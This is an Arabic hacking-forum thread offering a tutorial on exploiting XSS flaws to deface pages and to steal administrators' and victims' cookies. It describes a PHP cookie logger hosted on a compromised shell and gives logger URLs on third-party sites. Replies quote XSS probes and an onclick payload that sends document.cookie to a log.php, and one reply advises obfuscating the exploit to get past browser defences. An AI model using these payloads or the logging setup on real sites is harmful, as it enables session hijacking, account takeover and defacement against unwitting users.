![]() |
[ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~ بسم الله الرحمآن الرحيم ان شاء الله اليوم رح نشرح \ اكتشاف تغرات xss \ تعليق الآندكس من تغرات xss \ سرقة كوكيز من تغرات xss ################ سرقة الكوكيز من تغرات xss اولا لازم نقوم بتنصيب السيرفر الشخصي ع جهازنا :) download تانيا لازم يكون عندنا الموقع المصاب او السكربت :) انا برمجة ملف عادي جدآآ ! مصاب بهذه التغره :nosweat: نسميه مثلا ..~ xss.php http://im9.gulfup.com/2011-08-21/1313925532191.jpg ومحتواه علشان تجربوآا معي الاستغلال الكامل لها ..~ كود PHP: طيب الآن نستعرض الملف المصاب مع المتغير ! ~~~~~~~~~~~~ على فكره شباب ! تم شرح التغره من قبل في المنتدى ..~ يستحسن انكم تراجعوا هذا الرابط ..~ http://www.vbspiders.com/vb/t24758.html & http://www.vbspiders.com/vb/t22376.html ~~~~~~~~~~~~ طيب نتابع :nosweat: http://im9.gulfup.com/2011-08-21/1313926238671.jpg طبعا كيف نكتشف التغره سهل كثير ..~ يعني تضيف الكود هذا كود PHP: رح ارفق لكم الكود في المرفقات مع كل حاجه ! طيب رح نضغط اوونتر ورح تشوف ان رساله ضهرت لنا في المتصفح ..~ http://im9.gulfup.com/2011-08-21/1313926438201.jpg تعال الآن نستفيد من التغره ! اولا التغره تقدر تسرق بها كوكيز الآدمن او الضحيه بصفه عامه ..~ تقدر تحقن اكواد html او تغره للمتصفح ملغومه بباتش علشان تخترق ..~ شو هاي الحلاوه ..~ ههه انا رح اشرح لكم كيف تسرق الكوكيز ..~ اولا لازمنا ملف لوج علشان يسجل لنا الكوكيز والمعلومات في ملف txt ملفات اللوج تكون خاصه :( وهناك ملفات لووج تجيب لك معلومات كامله ! كوكيز + الوقت + التاريخ + ... وفي نوع آخر عادي ..~ يعطيك الكوكيز فقط ! ههع رح اعطيكم ملف لووج عندي كثير حلو :in_love: طيب نشوف السورس كود بتاعوا ..~ كود PHP: انا عندي مرفوع على شل ..~ الموقع يلي رفعنا لو الووج رح يكون زي هيك مثلا ! www.vbspiders.com/log.php ورح يسجل لنا المعلوومات في ملف اسموا nor15din.txt www.vbspiders.com/nor15din.txt :fruits_cherry: طيب الآن كيف نستغل التغره ..~ يلزمنى كود تلغيم ..~ كود PHP: كود PHP: رح نضيف هذول الاكواد مع تغير مايجب تغيره http://im9.gulfup.com/2011-08-21/1313927231191.jpg اقتباس:
اقتباس:
ياريت اي واحد ينقل الموضوع ..~ يحافض على الحقوق :( :sadwalk: لتحميل الادواة ~~~~~~~~~~~~~~~~~~ الشي يلي اضفناه وجديد هو اننا شرحنا كل شي تقريبا يتعلق بهذه التغره في فيديوا + صفحه HTML :showoff: لتحميل الشرح الكامل على شكل صفحه HTML لتحميل فيديوا التطبيق وفي الاخير هذيه بسيطه وهي ملف لوج مرفوووع وجاهز :) http://www.illicitromance.com/log.php وفي هذه الصفحه رح يتم تسجيل الكوكيز + المعلومات :) http://www.illicitromance.com/nor15din.txt ع فكره هذه طريقة اخرى لتعليق آندكس مميز من تغرات xss http://www.vbspiders.com/vb/t38054.html ~~~~~~~~~~~~ وهنا طريقة اخرى لاستغلال التغره مشروحة من طرف حبيبنا IronMan :bleh: جديد استخدامات xss وهي الـ phishing login بالتوفيق .. @nor15din |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ بارك الله فيك علي شرح ثغرة قوية |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ :icon30::icon30: بارك الله فيك |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ اقتباس:
:blushing: |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ اقتباس:
شفتني العب مع القرده ؟ ------------------------------------- برب بمزح ههه يعطيك العافيه يا حبيبي كاسبر ! الشرح فيديوا يلي قلت لي عنه رح انزلوا لك ان شاء الله :( |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ مشكووووووووور اخ نورد الدين على الشرح الوافي ماشاء الله عليك دائما متوفق سلآم |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ اقتباس:
:2: |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ وعليــكم السـلآم و رحمة الله الله يعطيـك العآفية حبيبي نورالدين شرح ممتآز تســلم أيديك :icon30: تقبل مروري :smile: |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ اقتباس:
تسلم على المرور العطر :blush-anim-cl: |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ بطل حبيبي.. يسلمو ايديك.. |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ اقتباس:
:fruits_cherry: |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار: انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح: كود: '"--></style></script>***************("Www.VBspiders.com")</script> كود: \'\" كود: '"--></style></script>***************(4444444)</script> ولكن لما اجيت احط هذا الامر: كود: "><a href="#" onclick="********.location='http://localhost/log.php' +escape(********.******);"><Click Me></a></script> تحياتي |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ اقتباس:
لازم يكون ع شل :( :2: |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ مشكور صديقي !! |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ اقتباس:
|
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ good job :) keep up |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ اقتباس:
|
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ يعطيك الف الف عافيه يا غالي......... اقتباس:
هاد السر بهاي الثغره والي محتكرها المحترفين ......!! بتعرف شغله انت لازم تضع الاستغلال بداخل صفحه html وتشفر الاستغلال وبعد تشفر صفحه html ;) اعملك شويه بحث وصدقني رح تزبط معاك السبب بانه ما زبط معاك هو المتصفحات الحديثه بتعمل شويه حمايه لها من هاي الثغره لكن التشفير ما عليه حمايه ...... مشكور يا نوووووور كثير ع تعبك وشرحك وفقت حبيبي |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ يعطيك العافيه حبيبي فولكانو |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ الشرح جميل جدا وممتاز على الي يعانو من هذه الثغرة والله الاخ ما قصر في شرحها واصل حبيبي |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ اقتباس:
بارك الله فيك منور الموضوع ..~ :2: |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ تسـلم كثير حبيبي .,, شرحك واضح + جميل ! cry هههههه |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ اقتباس:
بعرفها مليح بلا .. ~ ههه الضاهر الكلمه عجبتك :sad_1: cry منور الموضوع :sad_1: |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ شرح جميل ومنسق .. يعطيك العافية يابطل واصـــــــل ^_^ |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ اقتباس:
|
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ باراك الله فيك نور موضوع قوي |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ اقتباس:
منور الموضوع زي مصباح 1000 وات 1000W :shutup: |
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~ شو هالحلاوة هاي ولك ! جو اون مان :) |
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~ اقتباس:
thx :2: |
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~ بارك الله فبك بس انا عندي استفسار بسيط هل يمكن ان نرفع ملف علي موفع معين ويكون هذا الملف مصاب بثغره xss ونقوم نحن باستغلال هذا الملف ,ولا لازم يكون الموقع ذات نفسه يكون مصاب بثغره xss علشان نسرف الكوكيز وهل سرقه الكوكيز للاعضاء المسجلين في الموقع ققط ولا لكل من يدخل علي الموقع من الزوار انا اسف اطلت عليك ولكن اردت ان تكتمل الصوره في مخيلتي |
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~ اقتباس:
اقتباس:
اقتباس:
:bleh: اقتباس:
|
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~ يعطيك العافية مبدع يا نور الدين |
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~ اقتباس:
بحبك :2: |
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~ يعطيك العافية يا بطل بس لو سمحت ممكن تضيف الكود في تكست لانه في الموضوع مخربته النجوم بالتوفيق لك.. |
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~ اقتباس:
|
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~ مشكوررررررررررررررررررررررررررررر |
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~ عطيك العافية اخوي عالشرح |
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~ ^_^ thx all :) |
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~ merciiiiiiiiiiiiiiiiiiiiii |
رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~ وااااو يعطيك الف عافيه |
الساعة الآن 10:32 AM |
[ vBspiders.Com Network ]